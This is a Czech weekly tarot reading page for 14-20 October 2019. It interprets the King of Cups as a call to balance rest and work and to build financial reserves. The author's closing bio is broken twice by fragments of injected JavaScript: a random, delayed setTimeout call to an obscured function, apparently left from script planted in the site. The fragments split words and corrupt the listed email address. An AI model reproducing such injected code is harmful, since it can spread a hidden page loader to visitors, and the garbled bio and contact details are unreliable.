Ezoterika, Magie,  Tarot

Týdenní čtení z tarotových karet: 14.-20. října 2019

Karta týdne: Král kalichů

Výzva krále kalichů:
Jste připraveni se znovu vrhnout do každodenního pracovního shonu? Nejdřív se zhluboka nadechněte, uklidněte se, a až pak se s odhodláním pusťte do bohumilé činnosti. Král kalichů vás vyzývá, abyste si uvědomili, že rovnováha je důležitá, protože pro skutečný pokrok jsou nezbytné jak odpočinek, tak akce. Pokud jste tak neučinili v průběhu víkendu, zregenerujte jakýmkoli způsobem, třeba krátkou procházkou před příchodem na pracoviště, a až poté vstupte opět „do proudu“. Potom budete mít ještě stále dost času a především energie investovat do svého lepšího hmotného zabezpečení, postupovat zcela klidně a s rozvahou vpřed, vytvářet nové plány i kroky k jejich realizaci. Odpočiňte si tedy alespoň několikaminutovým klidným a vědomým dýcháním, sledováním proudu vody či oblaků plynoucích po obloze, znovu se tak „aktivujte“ a pak – vpřed. Nejste-li pracovně aktivní, i tak vám tento týden významně pomůže naučit se střídat chvilky úplného nicnedělání s aktivnějšími chvilkami. Plyňte prostě s životem, nalaďte se na podzimní náladu a nevzpírejte se pokojnému rozjímání.

Obecný význam Krále kalichů na tento týden:
Měli byste v těchto den chránit jak sebe sama, tak ty, na kterých vám záleží, aby nedošlo k něčemu, z čeho nebudete mít velkou radost. Možná budete muset něco obětovat, abyste jste včas předešli něčemu, k čemu nemusí vůbec dojít, budete-li obezřetní a připravení, navíc dobrý pocit a zejména získané bezpečí a pohoda budou za příslušnou oběť stát. Možná dostanete rovněž chuť zapracovat na svém lepším zajištění, i na zajištění svých blízkých. V tom lepším případě začnete vytvářet aspoň o trochu vyšší finanční rezervy. Budete muset odvést jistou práci, na kterou jste buďto zapomněli, anebo ji nedokončili, či vám v tom něco zabránilo. Bude nutné ukázat větší snahu a vydat ze sebe víc, než by se vám chtělo. Dva tři dny tohoto týdne utečou doslova jako voda. Ty zbývající sice tempo zpomalí, ale jenom za předpokladu, že si je náležitě užijete a nejenom protrpíte.

Judita Katona Peschlová, zkušená kartářka, psychoterapeutka, terapeutka andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andělské terapie a lektorka rodinných konstelací, žurnalistka a spisovatelka; www.angelcity.cz, judita.andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andele@gmail.com